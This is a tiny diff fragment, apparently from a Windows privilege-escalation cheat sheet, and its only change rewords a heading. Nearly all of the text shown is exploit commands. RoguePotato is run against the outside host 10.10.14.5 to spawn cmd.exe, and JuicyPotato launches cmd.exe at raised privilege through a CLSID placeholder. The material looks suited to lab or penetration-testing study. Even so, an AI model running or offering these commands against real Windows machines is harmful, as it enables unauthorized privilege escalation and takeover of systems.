 .\RoguePotato.exe -r 10.10.14.5 -e "cmd.exe" -l 9999

-# JuicyPotato (older Windows)
+# JuicyPotato (older Windows versions)

 .\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}